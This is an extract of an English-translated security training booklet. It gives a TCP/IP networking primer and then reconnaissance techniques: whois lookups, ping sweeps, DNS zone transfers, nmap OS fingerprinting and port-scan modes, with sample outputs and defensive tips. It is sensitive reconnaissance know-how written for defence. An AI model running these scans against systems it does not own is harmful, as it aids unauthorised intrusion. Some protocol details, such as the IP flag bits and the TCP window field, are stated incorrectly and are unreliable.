Hack security “pro” Important The aim of the present The Hackademy training course booklet is to contribute to a better understanding of security risk...
Important The aim of the present The Hackademy training course booklet is to contribute to a better understanding of security risks in the use of IT, thus allowing a better protection from these risks. It will be of use to network and system administrators, developers and professionals working with the Internet. If you wish to understand how a hacker could try to attack you, and you want to protect yourself from these attacks, this training course is made for you. However, no guarantee is given that the contents of this course will give you total protection; you will nonetheless have all the material you need to develop an efficient security management policy. Furthermore, this course cannot aim to exhaustively cover all aspects of security: we detail common attack methods and give you the means to protect yourself from these. The Hackademy and DMP cannot be held responsible for any damage caused by an implementation of the methods presented here. It is strictly forbidden by law to apply any of the attack methods presented in this training course on any system that you do not own. You can however apply them on computer systems as vulnerability tests, bearing in mind that there are always risks involved for the stability of audited systems.
Warning It is essential to understand that the methods in this booklet are presented above all as a general comprehension of security and of methods used by hackers, with the one and only aim of fighting against this danger. What's more, these protection methods can be used both by companies and individuals. Leaving aside all the private documents stored on your computer, a hacker could use your system as a gateway, to avoid being found. In this case, it would be up to you, as a natural person or as a legal entity, to prove your innocence. In case of hacking, the proper security policy is to entirely reinstall your system again, resulting in a loss of both time and money. The general structure of this document will be as follows: > Description of the attack or the type of vulnerability. > Means to implement to avoid becoming a victim
The Hackademy
DMP
-2/209-
SYSDREAM
Authors For their contribution to the elaboration of this training course and the writing of this booklet, we would like to thank:
Chapter I: Information Acquisition.............................................................21 Public Information Acquisition.....................................................................................22 Network Mapping........................................................................................................ 26 Zone Transfer............................................................................................................. 27 Fingerprinting the System........................................................................................... 29 Port Scanning............................................................................................................. 29 Listing of Services.......................................................................................................31 Netbios Listing............................................................................................................ 36 Applicative Fingerprinting............................................................................................38 Listing of Firewalling Rules......................................................................................... 38
Chapter VI: Systems Vulnerabilities...................................................................... 166 Brute Force Authentication....................................................................................... 167 System Spying.......................................................................................................... 176 Backdoors and Rootkits............................................................................................ 178
Chapter VII: Generic Security Procedures......................................................... 181 Intrusion Detection Systems..................................................................................... 182 Monitoring with Windows.......................................................................................... 184 Anti Portscan.............................................................................................................185 Cryptography............................................................................................................ 186 System Integrity........................................................................................................ 196 Firewalling.................................................................................................................198 VPN...........................................................................................................................205
The Hackademy
DMP
-5/209-
SYSDREAM
INTRODUCTION
The Hackademy
DMP
-6/209-
SYSDREAM
INTRODUCTION TO TCP/IP NETWORKS Networks Notions The material Any communication needs a medium. This also applies to IT, so it was necessary to create interfaces capable of translating the binary language of a digital system into a signal appropriate for a medium (copper pair cable, coaxial cable, fiber optics, etc.) These interfaces have electronic circuits that can allow you to listen and transmit on a medium. Each adaptor also has a small quantity of memory that is accessible by the host system (PC, etc.) The first phase of development was to create these adaptors, as well as delivering, for later developments, a precise documentation on registers and addresses to use and operate the communication functions. These operations are the first layer of the OSI reference model. It is the physical layer. It allows a communication between a (digital) system and an (analogical) transmission medium (airwaves, laser, copper, fiber optics, etc.) The most common cards are the Ethernet 802.3 cards (RJ45, BNC, AUI); they can withstand outputs of 10Mb/s or 100Mb/s. They can transcript digital data (e.g. 0011 0100) into tension appropriate for the medium (amplitude, coding, etc.) Network adaptors also handle the medium's condition, and can detect a certain number of errors on it. This part is transparent to developers, it is however ensured by each NIC (Network Interface Card). All Ethernet cards have a single physical address. This address, also called a MAC (Media Access Control) address is used for dialogues between the two cards. It is coded on 6 bytes, the first 3 describing the manufacturer (e.g. 00:0a:24 is the manufacturer 3COM). MAC addresses (MAC addresses format) are generally shown in a hexadecimal form, each byte being separated by the ':' symbol (e.g. 00:40:05:61:71:EC). Transmissions security (reliability) The network layer therefore links a destination to the network (either directly or indirectly, hence the routing functions); it also takes care of basic service management operations. ICMP packets can be exchanged between routers or stations to indicate an event on the network (loss of packet, screening, oversized packet and necessary IP fragmentation, etc.) It is however necessary to have the software part capable of ensuring the proper emission/reception of data. When a packet (or datagram) does not reach its destination, with no software intervention, the pack has not arrived, but will never be automatically transmitted again. Two protocols can fill this void: UDP (User Datagram Protocol) and TCP (Transmission Control Protocol). UDP does not control packet losses, each packet is transmitted without being numbered to the destination, and without acknowledgement. As for the TCP protocol, it ensures a more reliable transfer of data, by opening a communication session before any dialogue, then by numbering packets for reconstruction, by re-transmitting lost or mistaken packets... The Hackademy
DMP
-7/209-
SYSDREAM
So the TCP and UDP protocols are the transport layer in the IP pile, they are the ones that ensure data transmission from one point of the network to the other, by handling (or not handling) the necessary retransmission of lost or altered packets, etc. Networks communications: the OSI and TCP/IP models Communications between systems are possible only if each system understands its destination (a Frenchman doesn't necessarily speak Spanish and vice versa). It was therefore necessary to devise a norm to allow everyone to communicate using an existing network. That is why TCP/IP is called an open network. The protocols used are standardized and available for the whole world. Anyone can thus adapt his owner system to communicate in TCP/IP, by writing the various software components according to TCP/IP standards (the majority of OS now have a TCP/IP implementation). The Open Systems Interconnection Reference Model has standardised an OSI-RM reference model, using 7 distinct layers. TCP/IP fits into this model, but does not systematically use all 7 layers. Each layer's role is to enable the upper layer to send to it the data that will be transmitted, as well as transmitting data from the lower layer to the upper layer (received data). We can therefore see that for a single communication between two systems, several protocols need to be used. Encapsulation Only the upper layer (Application) contains data, and this is only the data that is to be transmitted or received. Each layer adds its own header, encapsulating data packets into bigger packets, or by taking off the header in case of reception. When a data packet needs to be transmitted by an application, this data will receive several headers according to the protocols used.
The Hackademy
DMP
-8/209-
SYSDREAM
In case of reception, each layer will take the necessary information and will then withdraw its headers to send the remaining data blocks to the next layer above. Links In certain cases, an extra layer is necessary. In case of access via a modem (by a serial link), there is no material address (MAC address) on a modem. This address needing to be used by the physical and network layers, in theory there can be no communication possible. A modem is not an interface network but a serial one (communication is done through a COM port), it has no material standard address, nor does it have any ROM giving an IP communication interface. An extra software layer is thus necessary, in order to simulate and provide an alternative to the use of a MAC address. In the case of a TCP/IP link with a modem, a PPP protocol (Point to Point Protocol) will generally be used; it will be placed between the network layer and the physical layer. This protocol will give a software solution to IP communications needing a MAC address. Layers and protocols used Each layer of the IP pile uses one or several protocols to fulfil certain functions (the transport layer uses TCP or UDP). With this method, layers can standardize incoming and outgoing data flows. Each layer (and thus each implementation) is therefore independent of upper and/or lower layers.
The Hackademy
DMP
-9/209-
SYSDREAM
•
A protocol is a dialogue known by the two parties, between two layers of the same level. A layer of any (l) level will only be capable of dialogue with another layer of the same level.
•
A service is the array of functions that the layer must absolutely fulfil, and it provides the interface to transmit data from the (l) layer to the (l+1) or (l-1) layer.
Address Resolution Protocol (ARP) During a dialogue between two stations, network adaptors must be able to take in the data sent to it, without processing data that is of no concern to it (resulting in a saving of CPU and network time). Some networks function in a bus form (non-switched Ethernet, coaxial links, etc.) and all data transits in the medium, so all network adaptors must analyse the packets to take into account only the ones that are directed to them. The only addresses available and that can be used at the level of the physical interface (layer 1 of the TCP/IP model) are MAC addresses. Without these addresses, each adaptor would have to decode each packet up to (IP) level 3 to know if this data is directed to it or not. In the case of a dialogue between two stations 10.23.23.2 and 10.23.23.254, the first step consists of finding the material address of the destination station, so as to send the data to this station (and specifying its material address rather than its IP one). That's when the ARP protocol can be used (level 3, network layer). This protocol will enable a station to find the material address of another station. To do so, if 10.23.23.2 wishes to contact 10.23.23.254, before any dialogue, the station will broadcast to all stations of the network an ARP request. Each station will then receive this ARP request, in the form of the following message: 10.23.23.2 station with xx:xx:xx:xx:xx:xx material address is looking for the material address of 10.23.23.254. All stations linked to this segment will then analyse this request, but only 10.23.23.254 station will answer it, by sending the following message: 10.23.23.254 station has yy:yy:yy:yy:yy:yy as a material address. 10.23.23.2 and 10.23.23.254 stations will then stock the two addresses (IP address and MAC address) obtained in a cache (called ARP cache, see figure -example of an ARP table) so that it won't have to ask the question again in case of a new communication within a short delay (a few minutes, after which the ARP cache will erase the couple of addresses if they are not used anymore).
The Hackademy
DMP
-10/209-
SYSDREAM
ARP heading:
The Hackademy
DMP
-11/209-
SYSDREAM
The ARP cache can be consulted with a shell:
Internet protocol (IP) On an Ethernet segment, it is not necessary to use a material or software layer to fulfil the linking functions. Level 2 protocols are used only on serial or parallel links, or on any other interface or equipment without a MAC address (e.g. PPP or SLIP for IP access via a modem). Each packet circulating on the network has several headers, because of consecutive encapsulations. A packet of data thus has at least one header linked to the medium used (usually Ethernet). This is the case for ARP. Packets using IP addresses will also have IP header information. The contents of this fixed 20-byte header (this is a minimum, it can be more if IP options are used) give information on the broadcasting station (IP address), the destination's address, the checksum, the protocol, the version, etc. There are 3 types of IP addresses: • • •
Unicast for one particular station Broadcast for all stations Multicast for a (pre-defined) Multicast group
IP header
The Hackademy
DMP
-12/209-
SYSDREAM
Version: 4 bits. The version field gives information on the Internet header format. The present document describes the protocol's version 4 format. Header length: 4 bits. The header length field codifies the length of the Internet header, the unit in use being the 32-bit word, which indicates the start of data. Please note that this field cannot have a value under 5 in order to be valid. Service type: 8 bits. The Service Type gives an indication of the service quality requested, however it remains an “abstract” parameter. This parameter is used to “guide” the choice of current service parameters when a datagram transits through a specific network. Some networks offer a priority mechanism, whereby a certain type of traffic will be treated preferentially to another, less preferred traffic (generally by accepting to transfer only packets above a certain level of preference in case of temporary overloading). The main choice offered is a negotiation between the three following constraints: a short delay, a low rate of error and a high output. Total length: 16 bits. The “Total Length” field is the length of the complete datagram, including header and data, measured in bytes. This field can only codify a datagram length of 65,535 octets. Such a length would anyway make datagrams impossible to handle for the vast majority of networks. Hosts will at least need to be able to accept datagrams up to a length of 576 bytes (whether it be a single datagram or a fragment). It is also recommended that hosts do not send datagrams over 576 bytes unless they are sure that the destination is able to accept them. Identification: 16 bits. An identification value, allocated by the broadcaster to identify the fragments of a single datagram. Flags: 3 bits. Various control commutators. Bit 0: reserved, must be left at 0. Bit 1: (AF) 0 = Fragmentation possible, 1 = non-fractionable. Bit 2: (DF) 0 = Last fragment, 1 = Intermediate fragment. Fragment offset: 13 bits. This field indicates the gap of the fragment's first byte related to the whole datagram. This relative position is measured in 8-byte (64-bit) blocks. The gap of the first fragment is equal to zero. Time to live: 8 bits. This field can limit the amount of time a datagram stays in the network. If this field is equal to zero, the datagram must be destroyed. This field is modified during the treatment of the Internet header. Each Internet module (router) must withdraw at least one time unit to this field during the transmission of the packet, even if the complete handling of the datagram by the module lasts less than one second. This time to live must thus be seen as the absolute maximum amount of time during which a datagram can exist. This mechanism exists because of the necessity to destroy any datagram that has not been correctly transmitted on the network. Protocol: 8 bits. This field indicates which upper level protocol is used in the data section of the Internet datagram. The different values allowed for various protocols are listed in the “Assigned Numbers” RFC [rfc1060]. Header checksum: 16 bits. Checksum calculated only on the header. As certain fields of the header (e.g. the time to live) are modified during their transit through the network, this checksum must be recalculated and checked at each network location where the header is re-interpreted. Address source: 32 bits. The source's Internet address. The Hackademy
DMP
-13/209-
SYSDREAM
Address destination: 32 bits. The destination's Internet address. Transmission Control Protocol (TCP) The transport layer (layer number 4 in the IP pile) ensures the prosper transfer of data. It is this layer that will for example number the TCP packets before broadcasting them on the network, so that the destination can re-assemble the entire data in the right order (this is not the case for UDP). Two protocols are frequently used in a TCP/IP environment: TCP and UDP. TCP ensures the numbering of packets, and the destination acknowledges each one. It is therefore necessary for the two parties to establish a dialogue negotiation. That is the reason why a TCP communication always begins by a synchronization of the two parties. The broadcaster asks the receptor if it is ready to receive data; the latter acknowledges the request, that the broadcaster then validates. The transfer of data can then start. The TCP connection is done on a “Three-Way Handshake Connection”.
Let us for example take a machine “A” and a machine “B”. Machine “A” is the client and machine “B” is the server. 1. A --- SYN---> B; The client machine sends a TCP packet with an activated SYN flag, which means: “Can I establish a connection? (SYN)” 2. A <--- SYN/ACK --- B; The server machine answers with a TCP packet and with activated SYN and ACK flags, which means: “Yes, you can establish a connection (ACK), and what about me? Can I establish a connection? (SYN)” It is necessary to send a packet with the SYN flag, even in the answer, for a connection is always a two-way one. 3. A --- ACK ---> B; The client machine answers with a TCP packet with an activated ACK flag, which means: “Yes, you can establish a connection (ACK)”. If a machine refuses a connection, it will answer with an RST to the SYN sent by the client. The Hackademy
DMP
-14/209-
SYSDREAM
TCP header:
Source Port: 16 bits. The source's port number. Destination Port: 16 bits. The destination's port number. Sequence Number: 32 bits. The number of the first byte of data compared to the beginning of the transmission (except if SYN is indicated). If SYN is indicated, the sequence number is the Initial Sequence Number (ISN) and the first byte's number is ISN+1. Receipt: 32 bits. If ACK is indicated, this field contains the sequence number of the following byte that the receptor expects to receive. Once a connection is established, this field is always informed. Data offset: 4 bits. The TCP header's size in word numbers is 32 bits. It indicates where data starts. In all cases, a TCP header is equivalent to an entire number of 32-bit words. Reserved: 6 bits. Reserved for future use. Must be at 0. Control bits: 6 bits (from left to right): URG: Urgent Data Check of significant ACK: Receipt of significant PSH: RST Push Function: SYN connection re-initialization: FIN sequence number Synchronization: End of transmission. Window: 16 bits. Reserved for future use. Must be at 0. Checksum: 16 bits. The checksum is done by calculating the complement to 1 on 16 bits of the sum of complements to 1 of the header bytes and the data taken two by two (words of 16 bits). If the whole message contains an odd number of bytes, a 0 is added at the end of the message to finish the calculation of the checksum. This extra byte is not transmitted. When the checksum is calculated, the positions of the bits consigned to it are marked at 0. The checksum also covers a pseudo-header of 96 bits pre-fixed to the TCP header. This pseudo-header contains the source's and the destination's Internet addresses, the protocol type and the length of the TCP message. This protects the TCP against routing errors. This information will be handled by IP, and given as an argument by the TCP/Network interface when TCP calls IP. Urgent Data Check: 16 bits. Communicates the position of urgent data by giving the gap compared to the sequence number. The check must send the urgent data to the following byte. This field is interpreted only when URG is indicated. The Hackademy
DMP
-15/209-
SYSDREAM
Options: variable. The options field size can vary, at the end of the TCP header. It will always be a multiple of 8 bits. All options are taken into account by the Checksum. An option parameter always begins on a new byte. It is made of two types of formats for options: first case: mono-byte option. Second case: option type byte, option length byte, option value byte. The option length takes into account the type byte, the length byte itself and all value bytes, and its value is measured in bytes. Please note that the option list can be shorter than what the data offset would have you believe. In this case a padding byte must be added after the end of options code. This byte must be at 0. TCP must implement all options. The options currently defined are (type is indicated in octal): Option Data: Segment maximum size: 16 bits. If this option is present, it communicates to the broadcaster the maximum size of segments it will be able to send. This field must be sent with the initial connection request (with SYN indicated). If this option is absent, the segment taken can be of any size. Padding: variable. Padding bytes end the TCP header: their byte number is always a multiple of 4 (32 bits) so that the data offset indicated in the header corresponds to the beginning of applicable data. User Datagram Protocol (UDP) UDP is faster, more tolerant, but also less reliable in its transmission technique. Data is transmitted without any guarantee that the broadcaster can receive it. Each packet is transmitted on the network (without being numbered) at the highest possible speed (depending on the station and the medium's state). If any packets are lost, the broadcaster cannot detect them (nor can the destination); data can also reach the destination in total disorder according to the complexity of the network's topology.
The Source Port is an optional field. When it is of any significance, it indicates the port number of the broadcasting process, and it will be supposed, in the absence of any further information, that any answer must be directed to it. If it is not used, this field will keep a value of 0. The Destination Port is of significance in the case of specific Internet addresses. The Length shows the number of bytes in the whole datagram, including in the present header (and consequently, the minimum length mentioned in this field is equal to 8 if the datagram carries no data). The Checksum is calculated by taking the complement to 1 of the sum out of 16 bits of the complements to 1 calculated on a pseudo-header made up of the typical information of an IP header, the UDP header itself, and data, with a zero byte added so that the total number of bytes be even, should this be needed. The Pre-header added before the UDP header contains the IP source address, the IP destination address, the protocol code and the UDP segment length. This information can increase the immunity of the network to datagram routing errors. The checksum calculation procedure is the same as for TCP. The Hackademy
DMP
-16/209-
SYSDREAM
TCP/UDP Port Notions: Multiplexing/Demultiplexing A station can simultaneously transmit and receive several TCP and UDP data flows. For this to happen, each extremity (and these can be different for each established communication) must be attached to a packet arriving on an interface. To do this, TCP and UDP protocols use port numbers. These numbers are COMPULSARY in any TCP or UDP communication, and can associate a communication to a process. All data transiting on the network therefore has two port numbers: the first one on the transmitting side, the second one one the destination side. All communications thus have 2 couples of numbers (IP address, port used) relative to an extremity. TCP and UDP ports are totally independent. It is therefore possible to have a simultaneous communication on port 25/TCP and port 25/UDP. This technique corresponds to multiplexing/demultiplexing. By decoding the port number in the packet, data is sent to one or the other process of the system. Systems conventionally implement the following rules: • •
Port numbers under 1024 can only be used by the super-user, A client application using TCP or UDP will use a port number above 1024 (even if the user is the super-user). There are however some voluntary exceptions, such as r-services...
A communication implies that a port be open to the client machine and that another port be open to the server machine. These ports are not necessarily the same one. 1. A server application opens a port permanently to allow for waiting time for connection requests. 2. A client application opens ports on a needs basis. It does not wait for a connection request, it does not have the role of a server application and therefore it is not a point of entry into a system. 3. There are 65,535 ports; no more, no less. Most of these are reserved for specific services (FTP: 21, telnet: 23, SMTP: 25, etc.) 4. A closed port is like a wall made of reinforced concrete: nothing enters, nothing exits. Examples 1. When A sends to B a TCP packet with an activated SYN flag, and the requested port is closed, B machine sends back a TCP packet with an activated RST flag. Some firewalls do not send back a TCP packet with an activated RST flag (such as ZoneAlarm). 2. When A wants to connect to B's HTTP server, its client application (Internet Explorer) will open a port (1106, for example). The client application will send a packet made up of IP, TCP, HTTP headers to port 80 of B machine.
The Hackademy
DMP
-17/209-
SYSDREAM
Here are some of the commonly used TCP ports according to their services: PORTS
PROTO
SERVICES
21
TCP
FTP
22
TCP
SSH
23
TCP
TELNET
25
TCP
SMTP
53
UDP
DNS
79
TCP
FINGER
80
TCP
HTTP
110
TCP
POP3
111
TCP
PORTMAPPER
119
TCP
NNTP
139
TCP
NETBIOS
143
TCP
IMAP
443
TCP
HTTPS
445
TCP
MICROSOFT-DS
2049
UDP
NFS
If data packets were transmitted in a totally disorganised manner, without any rules guiding their transmission and construction, systems would not be able to understand each other in a global way. The system of an A company would understand another A company's system; but not that of a Q company. For systems to be able to understand the data they send to each other, there has to be a standard to the way this data is constructed and the way it is sent. This standardization is done thanks to the development of “protocols”. each packet will be made of headers specific to a protocol. On the Internet, the most common protocol is TCP (Transmission Control Protocol). When you go to a website, for example http://www.dmpfrance.com, the IP (Internet Protocol) protocols, TCP and HTTP (Hyper Text Transfer Protocol) will be used to send and construct data packets. • • •
IP will be used to define anything concerning the addressing of data; TCP will define the type of packet sent; HTTP will send data that is specific to it, i.e. web pages.
IP will be used in the addressing of packets, thus allowing the transmitting and receiving relay machines to establish a correct path of data transmission. TCP will define the type of packet, i.e. a type of packet that can be used to establish a connection, close it, etc. These two protocols are definitely the most important on the Internet at a global level. Using the Netstat command The “netstat” command is an instructive one, although it is not always easy to read. It shows the protocol statistics and the TCP/IP network connection in use on the local machine. The Hackademy
DMP
-18/209-
SYSDREAM
Start the MS-DOS control interface
The first column shows the protocol used in the communication. The second one shows your machine's address, or its name. After the double dot comes the number of the port used in the communication. The third column shows the address of the destination machine. After the colon comes the number of the port used in the communication. The last column shows the state of the communication: whether it is established, being established, ending, etc. Note: If a server application such as a Trojan monopolises a port, and an intruder is connected to the trojan, you will be able to see it thanks to netstat! IP addressing Any system wishing to communicate on the global IP network (Internet) must have an IP address. These addresses, given by regulation bodies, are filed and standardized. An Internet station can only be located (reached) by its unique couple of addresses (IP address, under-network mask). IP addresses: An IP address is made up of two fields: the network address and the machine address. The network address is calculated on the most significant bits, whereas the machine address is calculated on least significant ones. There are several categories of addresses, namely categories A, B, C, D and E. The difference between them is the number of most significant bits in them. An IP address always takes the following form: a.b.c.d. In A class, b, c and d values can be freely fixed. In theory, one can address a maximum of 16,777,216 (2 3x8 =224) machines. B class leaves the values of c and d free. So one will be able to address 65,536 (2 2x8 =216) machines. C class leaves only the value of d free. So one will be able to address 256 (28) machines. D class is a different one, as it is reserved for a particular use: multicasting (broadcasting in real time towards several destinations). The Hackademy
DMP
-19/209-
SYSDREAM
As for the E class, it has not been used up to now except for experimental use. In theory, one has the following address ranges:
Specific addresses:
127.0.0.1 localhost or loopback 62.0.0.0c designates the A class network (all bits from H to 0). 62.255.255.255 designates all machines of A class network (Broadcast) (all bits from H to 1). There are several so-called non-routable addresses. These addresses are reserved for internal use, or for private networks. In theory, these are never routed on the Internet. There are 3 types of IP addresses: • • •
A class: 10.0.0.0 B class: 172.16.0.0 to 172.31.0.0 C class: 192.168.0.0 to 192.168.255.0
127.0.0.0 is also a particular A class, as it is never dispatched on the network. It is reserved for internal use. It corresponds to the loopback interface. The IP address 127.0.0.1 therefore designates your computer.
The Hackademy
DMP
-20/209-
SYSDREAM
CHAPTER I INFORMATION ACQUISITION
The Hackademy
DMP
-21/209-
SYSDREAM
1. Public information acquisition An intrusion attempt always starts by acquiring information on the target system. To do this, a methodology is applied. In the following explanations, we will see what these techniques of gathering information on a system are, how they can be used, and of course how to protect yourself. A) Whois databases The information given during the registration of a domain name are saved in public databases called whois databases, and can be consulted freely on the Internet. This data can be found on the domain names providers' websites (gandi, Internic, Arpanet ...) or via websites that directly consult providers' databases associated to the domain name (www.allwhois.com). You can find the name and telephone number of the person in charge of the domain, the DNS server addresses and the IP ranges associated to the domain. The result of a request concerning thehackademy.net domain will for example give the following result: Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: THEHACKADEMY.NET Registrar: GANDI Whois Server: whois.gandi.net Referral URL: http://www.gandi.net Name Server: NS7.GANDI.NET Name Server: CUSTOM2.GANDI.NET Status: ACTIVE Updated Date: 19-apr-2004 Creation Date: 28-oct-2002 Expiration Date: 28-oct-2005 >>> Last update of whois database: Tue, 4 May 2004 07:33:44 EDT <<<
DMP DMP DD61-GANDI DMP 7, rue darboy 75011 Paris France 0143554656 0143554646 [email protected] 2003-10-29 13:26:19
B) Internet A person You are perhaps a regular on forums or newsgroups, or you have your own web page. A hacker who would have targeted you could start a search of your presence on the web to acquire further information. •
As far as newsgroups are concerned, all the hacker has to do is to use search engines specific to newsgroups, such as http://groups.google.com
•
Concerning forums and websites, a simple search with a search engine such as Google (http://www.google.com) will do.
•
The main danger of this type of referencing is that you can divulge information that is not destined to the public. Imagine that you experience an installation problem for a specific server on a given operating system; the hacker will have no trouble knowing the name and the version of your server and your operating system. So you must at all cost avoid disclosing non-essential information on a place that offers as little security as the web.
•
A hacker can also find information through people close to you, by trying to intrude into your private or professional life. Also, you should not forget that it could be someone you know and that he could know private information about yourself. To avoid any unpleasant surprises, never use passwords related to your birth date, the names of your wife, children or pets, or related to information about yourself that could be found out.
•
Another method that we have already mentioned is the one called social engineering, which tends to be under-rated. The idea is to use any communication medium (telephone, email,...), or even for the person to physically present himself, to present a fake identity in order to obtain confidential information. A common technique used by web mail, for example, is to send an email seeming to come from one's administrator and using the excuse of a server breakdown to ask you to register again and asking for a login and password; these will then be sent to the hacker. So you must assume that in no case a body or company where you have an account will ever ask you for your password; at the most, it will ask for your login.
The Hackademy
DMP
-23/209-
SYSDREAM
A company •
For obvious promotional reasons, your company is perhaps present on the web. This can be a further source of information for the attacker if you do not filter the information broadcast on it.
•
The status of your company, the name of employees and their email addresses, the name and address of the webmaster in the webpages code sources, non-secured links to elements not destined to the public... These are all informations that your hacker will be more than happy to recover.
•
Furthermore, there are often cases where the login/password pairs are related to name/given name pairs. If this information is present on the site, our hacker could try the total number of possible combinations by conceiving a list of likely logins/passwords obtained on the site.
After having obtained a certain number of informations on the target system, the hacker will move on to more technical operations, which must be done on the system, so as to later elaborate an attack strategy.
C) Technical Information The very first step for a hacker will always be to obtain your system's ip address, in order to be able to communicate with it. The Ping function can be used to check that the system is active on the network. The machine that sends a ¨ping¨ to another one expects an echo from its call to ensure that it is indeed available. The PING message must follow the normal IP routing through the gateways and routers... For this, it uses the ICMP protocol encapsulated in the IP packet. The return of a PING (ICMP REPLY) generally gives the time taken by the message to do a round trip (RTT = round trip time) to the destination. There are several versions of PING, and these are more or less complex. The “CODE” field of the ICMP message can give information on the results of the test: Network unavailable... Machine unavailable... Routing failure... Etc. Ping integrates several functions. To visualise all of them, type “ping” in DOS. Among the various functions of ping, these can be highlighted: 1. The “-t” option, which sends ICMP_echo_request packets over and over again, until the user interrupts with a “break” (CTRL+C), e.g. ping -t [IP address] 2. The “-a” option, which is used to replace an IP address with a host name, e.g. ping -a [IP address] 3. The “-n” option, which is used to send a specific number of ICMP_echo_request packages, e.g. ping -n 8 [IP address] 4. The “-l” option, which can specify the size of the request to send, e.g. ping -l 64 [IP address] 5. The “-i” option, which can impose a basic time to live (TTL), between 1 and 255, e.g. ping -i 145 [IP address] 6. And in some cases the “-w” option, which can specify the waiting time for echo_reply packets (“timeout”), e.g. ping -w 999 [IP address] The Hackademy
DMP
-24/209-
SYSDREAM
In the answer field you will find: • the size of the packet you have sent, in bytes; • the answering delay of the target system, in milliseconds; • and the amount of TTL when the packet has arrived at destination. Four ICMP_echo_request requests are sent during a common use of Ping, in order to be sure of the results. The tracert command Tracing the route taken by a packet to go from a point A to a point B can be useful; for example to determine which geographical zones it crosses, or the last router taken to send data. To do this, you will use the Tracert tool on your system. Tracert is the abbreviation of “Trace Route”. The aim of this software is to highlight the path followed by a data packet to reach a precise location of a network. It can be used the check how a network is performing, to check where congestion points are located or to pinpoint infrastructure problems. The software creates a packet with the source and destination address and the amount of TTL time to live (number of gateways crossed) equal to “1”. This packet will stop at the first router it encounters. The latter will send an ICMP error message (time exceeded) with its address as a “source” and the broadcaster's “source” address. The “traceroute” software will save this information and create a new packet like the first one, but with a TTL of “2”. Crossing the first router will put TTL to “1”. The packet will therefore die on the second router. As previously, router number 2 will send an ICMP error message with its address, which will be memorised by “traceroute”... And so on and so forth until the destination.
The Hackademy
DMP
-25/209-
SYSDREAM
Use the Tracert tool of your system.
Tracert integrates various functions. To visualise them all, type “tracert” in DOS. Three of these functions can be essential. 1. The “-d” option prevents the conversion of the IP addresses of the machines that relay the host names, e.g. tracert -d [IP address] 2. The “-h” option can specify the maximum number of relays, i.e. the maximum number of relay points, e.g. tracert -h 45 [IP address] 3. The “-w” option, which can specify a timeout or a delay after which the process is aborted, specific to the resolution of each host, e.g. tracert -w 999 [IP address] In the results table, you will find a classification of data relay systems. The delays in milliseconds show the amount of time that was needed to contact each relay system, knowing that each trial is done three times. In the last column appear the host names of the relay systems, with their translation into IP addresses. Train yourselves to find the information given in host names and in a traceroute.
2. Network machines listing A) Network Mapping The idea is to list all the machines present on the network, via ICMP requests (ping) on all IPs of a determined range, in order to have a complete picture of which machines are activated. This technique can be done manually with a scan tool of nmap type, which can be used in the shell (with Windows and Linux):
The Hackademy
DMP
-26/209-
SYSDREAM
nmap -sP 192.168.124.0/24 Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-18 20:26 CEST Host 192.168.124.1 appears to be up. Host 192.168.124.2 appears to be up. Host 192.168.124.10 appears to be up. Host 192.168.124.12 appears to be up. Host 192.168.124.15 appears to be up. Host Dantes (192.168.124.20) appears to be up. Nmap run completed -- 256 IP addresses (6 hosts up) scanned in 7.195 seconds
Graphic utilities can be used to do the same type of operation: What's up gold:
B) Zone Transfer All domains are associated to a DNS server, hosted either on the network itself, or externally. The role of this service is to send back to a client an IP address associated with a host name. The zone transfer asks the DNS server to list all entries related to a specific domain. This is generally used by secondary name servers to update their entries. If the consultation of these entries is not limited to the secondary server, a hacker can list a domain's entries. The network can then be mapped, without the intruder having to independently ping each machine. The nslookup utility, present on both Linux and Windows, can carry out this operation.
The Hackademy
DMP
-27/209-
SYSDREAM
With Linux, the host utility can be used in the shell: xdream@Laptop:~$ host -l domain server_DNS Using domain server: Name: i.fi Address: 212.16.X.X#53 Aliases: i.fi SOA ns.i.fi. hostmaster.i.fi. 1084863621 28800 7200 604800 86400 i.fi name server ns.i.fi. i.fi name server ns1.etworks.net. i.fi name server ns2.i.fi. i.fi name server ns2.etworks.net. i.fi has address 212.16.x.x .... zuge.i.fi RP zuge.i.fi. . i.fi SOA ns.i.fi. hostmaster.i.fi. 1084863621 28800 7200 604800 86400
Security It is however possible to limit this zone transfer, which in Windows is authorised by default, towards any server. To do this, launch the MMC utility under \Services and Applications\DNS\ [server]\Forward Lookup Zone\[Zone Name] | Properties, select the option Only to the Following Servers, and give your backup server's ip address. It is also possible to completely deactivate this zone transfer if you believe you do not need it, by deselecting the option “Allow Zone Transfer”.
The Hackademy
DMP
-28/209-
SYSDREAM
C) Fingerprinting the system The nmap scanner has an active fingerprinting option: nmap -O 192.168.124.20 Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-18 22:02 CEST Interesting ports on Dantes (192.168.124.20): (The 1648 ports scanned but not shown below are in state: closed) PORT STATE SERVICE ... Device type: general purpose Running: Linux 2.4.X|2.5.X OS details: Linux Kernel 2.4.0 - 2.5.20 Uptime 19.098 days (since Thu Apr 29 19:41:12 2004) Nmap run completed -- 1 IP address (1 host up) scanned in 5.626 seconds With Linux: Laptop:/home/xdream# p0f p0f - passive os fingerprinting utility, version 2.0.2 (C) M. Zalewski , W. Stearns p0f: listening (SYN) on 'wlan0', 193 sigs (9 generic), rule: 'all'. 192.168.124.12:35657 - Linux 2.4/2.6 (up: 85 hrs) -> 192.168.124.20:80 (distance 0, link: ethernet/modem) 192.168.124.12:35658 - Linux 2.4/2.6 (up: 85 hrs) -> 192.168.124.20:80 (distance 0, link: ethernet/modem)
D) Port scanning
All open ports of the target system are listed to deduce the active services accessible by the attacking machine. Some ports are generally associated to some standard services: Port
Protocol
21 22 23 25 53 80 110 111 139 443 2049
TCP TCP TCP TCP UDP TCP TCP TCP TCP TCP UDP
The Hackademy
DMP
Associated Service FTP SSH Telnet SMTP DNS HTTP POP3 Portmapper Netbios HTTPS NFS -29/209-
SYSDREAM
It is however important to note that the fact that a port is open does not always imply that the active service is the one that is normally associated to it: It is entirely possible to open another service than a web server on port 80, as it is possible to have a web server running on another port than port 80. A manual analysis, detailed below, will thus be necessary to associate a port to an appliance. Several scanning methods can be used. We will use nmap (in Windows and Linux) for this exercise: •
The connect() mode: Nmap will deduce that a port is open if the connection is completely established with a port.
•
The syn scan: If a SYN/ACK packet is received after a SYN packet is sent, Nmap deduces, as in connect mode, that the port is open. In order to bypass the old IDS, which detected a scan only if communications were entirely established, Nmap does not finalize the connection with the sending of an ACK packet. This mode is used by default.
